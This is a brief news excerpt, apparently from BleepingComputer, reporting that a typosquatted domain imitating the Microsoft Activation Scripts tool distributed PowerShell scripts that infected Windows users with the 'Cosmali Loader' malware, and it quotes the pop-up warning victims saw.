A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.